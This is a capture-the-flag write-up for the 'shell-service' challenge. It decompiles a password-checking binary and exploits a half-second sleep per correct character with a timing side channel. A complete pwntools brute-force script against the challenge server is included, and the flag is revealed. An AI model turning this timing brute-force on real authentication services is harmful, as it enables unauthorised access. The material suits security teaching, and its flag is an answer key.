Description
Analysis
Here is what we got for the challenge: a fake flag.txt, a password.txt.tar.gz file, and an executable named shs:
Archive: shell-service.zip
Length Method Size Cmpr Date Time CRC-32 Name
-------- ------ ------- ---- ---------- ----- -------- ----
0 Stored 0 0% 2024-06-14 10:36 00000000 dist/
19 Stored 19 0% 2024-06-14 09:20 ea673e1b dist/flag.txt
53356555 Defl:X 53364981 0% 2024-06-14 10:34 7676c6f2 dist/password.txt.tar.gz
16904 Defl:X 3481 79% 2024-06-14 10:34 30f0670d dist/shs
-------- ------- --- -------
53373478 53368481 0% 4 files
The shs executable is a 64-bit Linux ELF file, not stripped, and includes all mitigations:
shs: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b9191fe56956287d0632bc7c58580751
7f6dd6c5, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Decompilation of main
Here’s the decompilation of the main function using Ghidra. The function prompts the user to input a password, checks if the length is 10, and then compares each character of the input with the expected character retrieved from the getPassChar function. If the input matches the correct password, the user is granted a shell. Otherwise, the program exits.
void main(void)
{
char cVar1;
size_t sVar2;
long in_FS_OFFSET;
int local_24;
char local_1b[11];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
puts("Enter the password:");
fgets(local_1b, 0xb, stdin);
sVar2 = strlen(local_1b);
if ((int)sVar2 != 10) {
puts("Wrong password!");
exit(0); // Exit if the length is not 10
}
for (local_24 = 0; local_24 < 10; local_24++) {
cVar1 = getPassChar(local_24);
if (cVar1 != local_1b[local_24]) {
puts("Wrong password!");
exit(0); // Exit if any character does not match
}
}
puts("Welcome, admin!");
system("/bin/sh"); // Give a shell if the password is correct
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
__stack_chk_fail();
}
}Summary:
- The function prompts the user to enter a password and reads the input.
- It checks if the input length is exactly 10 characters.
- It iterates over each character of the input, comparing it with the corresponding character returned by the
getPassCharfunction. - If any character does not match, it prints “Wrong password!” and exits.
- If all characters match, it prints “Welcome, admin!” and gives the user a shell.
Decompilation of getPassChar
Here is the decompilation of the getPassChar function, which extracts and returns a specific character from an archived file:
char getPassChar(uint param_1)
{
int iVar1;
char *pcVar2;
long lVar3;
long in_FS_OFFSET;
char local_3e;
undefined8 local_38;
undefined8 local_30;
char local_25 [10];
char local_1b [11];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_30 = archive_read_new();
archive_read_support_filter_all(local_30);
archive_read_support_format_all(local_30);
iVar1 = archive_read_open_filename(local_30,"password.txt.tar.gz",0x2800);
if (iVar1 != 0) {
puts("Failed to open archive");
/* WARNING: Subroutine does not return */
exit(1);
}
snprintf(local_25,10,"%d.txt",(ulong)param_1);
do {
iVar1 = archive_read_next_header(local_30,&local_38);
if (iVar1 != 0) goto LAB_00101500;
pcVar2 = (char *)archive_entry_pathname(local_38);
iVar1 = strcmp("password.txt",pcVar2);
if (iVar1 == 0) {
lVar3 = archive_read_data(local_30,local_1b,10);
if (lVar3 != 10) {
puts("Failed to read password");
/* WARNING: Subroutine does not return */
exit(1);
}
local_3e = local_1b[(int)param_1];
goto LAB_00101500;
}
pcVar2 = (char *)archive_entry_pathname(local_38);
iVar1 = strcmp(local_25,pcVar2);
} while (iVar1 != 0);
lVar3 = archive_read_data(local_30,local_1b,1);
if (lVar3 != 1) {
puts("Failed to read password");
/* WARNING: Subroutine does not return */
exit(1);
}
local_3e = local_1b[0];
LAB_00101500:
if (local_3e == '\0') {
puts("Failed to find password");
/* WARNING: Subroutine does not return */
exit(1);
}
iVar1 = archive_read_free(local_30);
if (iVar1 != 0) {
puts("Failed to free archive");
/* WARNING: Subroutine does not return */
exit(1);
}
usleep(500000);
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return local_3e;
}Summary:
- The function initializes an archive reader and sets up the necessary support for all filter and format types.
- It attempts to open the archive
password.txt.tar.gz. If it fails, it prints an error message and exits. - The function forms the file path using the given index (
param_1) and prepares to search for this file in the archive. - Archive Reading Loop:
- It iterates over the entries in the archive, checking for a file named
password.txt. - If found, it reads the first 10 bytes and returns the character at the specified index (
param_1). - If the specific indexed file is found, it reads a single byte and returns it.
- It iterates over the entries in the archive, checking for a file named
- If any reading or matching operation fails, it prints an error message and exits.
- After finding the character, the function frees the archive resources and sleeps for half a second, then returns the character.
Solution
Time Based Side Channel Attack
As we observed in the analysis, the program sleeps for half a second each time it checks a character in the password. If the first character is correct, the program will sleep for one second in total because it will take half a second to check the first character and another half second to move on and check the next one. However, if the character is incorrect, the program won’t sleep for the additional half second since it won’t proceed to the next character.
By keeping track of the response times, we can figure out each character of the password. This method of exploiting the timing differences is known as a timing-based side channel attack.
Guessing The Password
In this scenario, we will create a password checker that determines if the password is correct based on the time it takes to respond to our input. The executable sleeps for half a second for each correct character but exits if a character is incorrect. The password is 10 characters long, and the checking starts from index 0 towards 10. So here is the approach:
- Start with a random 10-character string as our initial password guess.
- Iterate through each character in the password.
- For each character, replace it with every printable character one by one.
- Measure the response time for each attempt.
- If the response time exceeds (half a second multiplied by the current index), the character is correct.
- Update the password with the correct character and move to the next index.
- Repeat this process until all characters are correctly guessed.
Here are some limitations:
- Network inconsistencies may affect response time measurements.
- System resource usage and running processes can introduce variability in response times.
Implementation
The implementation of this side channel attack involves iterating through each character of a password, measuring the response time to determine correctness. We start by initializing the password with placeholder characters and defining our parameters, including an error tolerance to account for measurement inconsistencies.
First, we initialize the password and set the initial wait time and error tolerance:
password = list('?' * 10)
current_index = 0
wait_time = 0.5 # as from the binary (usleep(500000))
error_tolerance = 0.09 # to account for inconsistenciesNext, for each printable character c, update the password, send it, and measure the response time:
password[current_index] = c
start_time = time.time()
io.sendline(''.join(password).encode())
io.recvuntil(b'W')
end_time = time.time()Calculate the duration of the response, compare it with the wait time, and update the index and wait time if the difference exceeds the error tolerance:
duration = end_time - start_time
dt = duration - wait_time
if dt > error_tolerance:
current_index += 1
wait_time = 0.5 * (current_index + 1)
breakFinally, check if the password is correct by looking for the string ‘admin’ in the output:
output = io.clean()
if b'admin' in output: # as from the binary: puts("Welcome, admin!");
print("Password:", "".join(password))
exit()
breakThis method iterates through each character position, updates the guessed character, measures the response time, and uses the timing information to refine the password guess until the correct password is found.
Full Solve Script
from pwn import *
from string import printable
import time
context.log_level = 'warn'
def setup_connection():
# io = process("./shs")
io = remote('vsc.tf', 7004)
io.recvuntil(b":")
return io
password = list('?' * 10)
current_index = 0
wait_time = 0.5
error_tolerance = 0.09
with log.progress('Guessing Password', level=logging.WARN) as progress:
while current_index < 10:
for c in printable:
try:
io = setup_connection()
password[current_index] = c
progress.status(''.join(password))
start_time = time.time()
io.sendline(''.join(password).encode())
io.recvuntil(b'W')
end_time = time.time()
output = io.clean()
io.close()
if b'elcome' in output:
print("Password:", "".join(password))
exit()
break
duration = end_time - start_time
dt = (duration - wait_time)
if dt > error_tolerance:
current_index += 1
wait_time = 0.5 * (current_index + 1)
break
except KeyboardInterrupt:
exit()The Flag
vsctf{h0w_much_t1m3_d1d_1t_t4k3_to_r3m3mb3r?}